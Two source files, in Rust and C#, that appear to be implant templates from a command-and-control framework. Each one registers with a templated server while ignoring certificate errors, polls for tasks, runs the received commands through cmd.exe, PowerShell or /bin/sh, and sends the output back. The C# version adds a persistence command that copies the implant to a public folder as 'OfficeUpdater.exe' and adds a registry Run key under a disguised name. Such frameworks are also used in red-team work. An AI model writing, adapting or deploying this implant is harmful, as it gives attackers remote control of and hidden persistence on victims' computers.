File: lib/templates/Implant.rs
use reqwest::Client;
use reqwest::Response;
use std::collections::HashMap;
use std::process::Command;
use std::time::Duration;
use tokio::time::sleep;

static IP: &str = "§IP§";
static PORT: &str = "§PORT§";
static URI_REG: &str = "§URIG§";
static URI_RES: &str = "§URIS§";
static URI_TAS: &str = "§URIT§";

#[tokio::main]
async fn main() {
    if let Err(e) = start().await {
        eprintln!("Error: {}", e);
    }
}

async fn start() -> Result<(), Box<dyn std::error::Error>> {
    let client = Client::builder()
        .danger_accept_invalid_certs(true)
        .build()?;

    let hname = hostname::get()?.to_string_lossy().to_string();
    let uri = format!("https://{}:{}", IP, PORT);
    let regl = format!("{}/{}", uri, URI_REG);

    let mut data = HashMap::new();
    data.insert("name", hname.clone());
    data.insert("type", "p".to_string());

    let response: Response = client.post(&regl).form(&data).send().await?;
    let mut name = response.text().await?;

    let resultl = format!("{}/{}/{}", uri, URI_RES, name);
    let mut taskl = format!("{}/{}/{}", uri, URI_TAS, name);

    println!("Connected to the server on {}:{}", IP, PORT);
    println!("|- My name is {}", name);

    let mut n = 3;

    loop {
        let task_response = client.get(&taskl).send().await?.text().await?;
        if !task_response.is_empty() {
            let task_parts: Vec<&str> = task_response.split_whitespace().collect();
            let flag = task_parts[0];

            if flag == "VALID" {
                let command = task_parts[1];
                let args: Vec<&str> = task_parts[2..].to_vec();

                if command == "shell" || command == "powershell" {
                
                    let shell_cmd = if cfg!(target_os = "windows") {
		    if command == "shell" { "cmd.exe" } else { "powershell.exe" }
		    } else if cfg!(target_os = "linux") {
		    	"/bin/sh"
		    } else {
		    	panic!("Unsupported operating system");
		    };

                    let arg = args.join(" ");
                    println!("|- Received command: {}", arg);

                    let result = shell(shell_cmd, &arg);
                    let mut result_data = HashMap::new();
                    result_data.insert("result", result);
                    client.post(&resultl).form(&result_data).send().await?;
                } else if command == "sleep" {
                    n = args[0].parse::<u64>().unwrap_or(3);
                    println!("|- Going to sleep for {} seconds", n);
                    let mut result_data = HashMap::new();
                    result_data.insert("result", "".to_string());
                    client.post(&resultl).form(&result_data).send().await?;
                } else if command == "rename" {
                    name = args[0].to_string();
                    println!("|- My new name is {}", name);
                    taskl = format!("{}/{}/{}", uri, URI_TAS, name);
                    let mut result_data = HashMap::new();
                    result_data.insert("result", "".to_string());
                    client.post(&resultl).form(&result_data).send().await?;
                } else if command == "quit" {
                    println!("|- Quitting...");
                    std::process::exit(0);
                }
            }
        }

        sleep(Duration::from_secs(n)).await;
    }
}

fn shell(file_name: &str, arguments: &str) -> String {

    let c_arg = if cfg!(target_os = "windows") {
	    "/c"
    } else if cfg!(target_os = "linux") {
	    "-c"
    } else {
	    panic!("Unsupported operating system");
    };
    
    let output = Command::new(file_name)
        .arg(c_arg)
        .arg(arguments)
        .output()
        .expect("Failed to execute command");

    let stdout = String::from_utf8_lossy(&output.stdout);
    let stderr = String::from_utf8_lossy(&output.stderr);
    format!("VALID {}\n{}", stdout, stderr)
}

File: lib/templates/Implant.cs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Net;
using System.Net.Http;
using System.Threading.Tasks;

public class Implant
{
    private static HttpClient client;
    private static string ip = "§IP§";
    private static string port = "§PORT§";
    private static string uriReg = "§URIG§";
    private static string uriRes = "§URIS§";
    private static string uriTas = "§URIT§";
    

    private static int n = 3;
    private static string name = "";

    static void Main()
    {

        Start().Wait();

    }

    public static async Task Start()
    {

        var handlerCert = new HttpClientHandler()
        {
            ServerCertificateCustomValidationCallback = HttpClientHandler.DangerousAcceptAnyServerCertificateValidator
        };


        client = new HttpClient(handlerCert);

        string hname = Dns.GetHostName();
        string type = "p";
        string uri = "https://" + ip + ":" + port;
        string regl = uri + "/" + uriReg;
        var data = new Dictionary<string, string>
        {
            { "name", hname },
            { "type", type }
        };

        //register itself to the server
        var response = await client.PostAsync(regl, new FormUrlEncodedContent(data));
        name = await response.Content.ReadAsStringAsync();

        //get the name assigned by the server
        string resultl = uri + "/" + uriRes + "/" + name;
        string taskl = uri + "/" + uriTas + "/" + name;

        Console.WriteLine("Connected to the server on " + ip + ":" + port);
        Console.WriteLine("|- My name is " + name);



        while (true)
        {
            var taskResponse = await client.GetStringAsync(taskl);
            if (!string.IsNullOrEmpty(taskResponse))
            {
                var taskParts = taskResponse.Split();
                string flag = taskParts[0];

                if (flag == "VALID")
                {
                    string command = taskParts[1];
                    string[] args = new string[taskParts.Length - 2];
                    Array.Copy(taskParts, 2, args, 0, args.Length);

                    if (command == "shell" || command == "powershell")
                    {
                        string f = command == "shell" ? "cmd.exe" : "powershell.exe";
                        string arg = "/c ";
                        foreach (var a in args)
                        {
                            arg += a + " ";
                        }

                        Console.WriteLine("|- Recived command " + arg);

                        int maxLength = 2000; // Imposta la lunghezza massima dei dati da inviare
                        string res = Shell(f, arg); // Esegue il comando e ottiene l'output

                        if (res.Length > maxLength)
                        {
                            res = res.Substring(0, maxLength); // Tronca l'output
                        }

                        var resultData = new Dictionary<string, string> { { "result", res } };
                        await client.PostAsync(resultl, new FormUrlEncodedContent(resultData));

                    }
                    else if (command == "sleep")
                    {
                        n = int.Parse(args[0]);
                        var resultData = new Dictionary<string, string> { { "result", "" } };
                        Console.WriteLine("|- Going to sleep for " + n + " seconds");


                        await client.PostAsync(resultl, new FormUrlEncodedContent(resultData));
                    }
                    else if (command == "rename")
                    {
                        name = args[0];
                        Console.WriteLine("|- My new name is " + name);

                        resultl = uri + "/" + uriRes + "/" + name;
                        taskl = uri + "/" + uriTas + "/" + name;


                        var resultData = new Dictionary<string, string> { { "result", "" } };
                        await client.PostAsync(resultl, new FormUrlEncodedContent(resultData));
                    }
                    else if (command == "persist")
                    {
                        string fOri = System.Reflection.Assembly.GetExecutingAssembly().Location;
                        string fDest = @"C:\users\public\OfficeUpdater.exe";
                        string rKey = @"HKCU:\Software\Microsoft\Windows\CurrentVersion\Run";

                        string payload = "Copy-Item -Path \"" + fOri + "\" -Destination \"" + fDest + "\"; Set-ItemProperty -Path \"" + rKey + "\" -Name OfficeUpd1a -Value \"" + fDest + "\"";   
    

                        string res = Shell("powershell", payload); // Esegue il comando e ottiene l'output
                        //Ok, no errors
                        if (res.Length == 8) res += "Persistence has been created";

                        var resultData = new Dictionary<string, string> { { "result", res } };
                        await client.PostAsync(resultl, new FormUrlEncodedContent(resultData));


                    }
                    else if (command == "rename")
                    {

                    }

                    else if (command == "quit")
                    {
                        Environment.Exit(0);
                    }
                }
            }

            await Task.Delay(n * 1000); // Sleep for n seconds
        }
    }

    private static string Shell(string fileName, string arguments)
    {
        var processStartInfo = new ProcessStartInfo
        {
            FileName = fileName,
            Arguments = arguments,
            RedirectStandardError = true,
            RedirectStandardOutput = true,
            UseShellExecute = false,
            CreateNoWindow = true
        };

        using (var process = new Process())
        {
            process.StartInfo = processStartInfo;
            process.Start();
            string stdout = process.StandardOutput.ReadToEnd();
            string stderr = process.StandardError.ReadToEnd();
            process.WaitForExit();
            return "VALID " + stdout + Environment.NewLine + stderr;
        }
    }


}
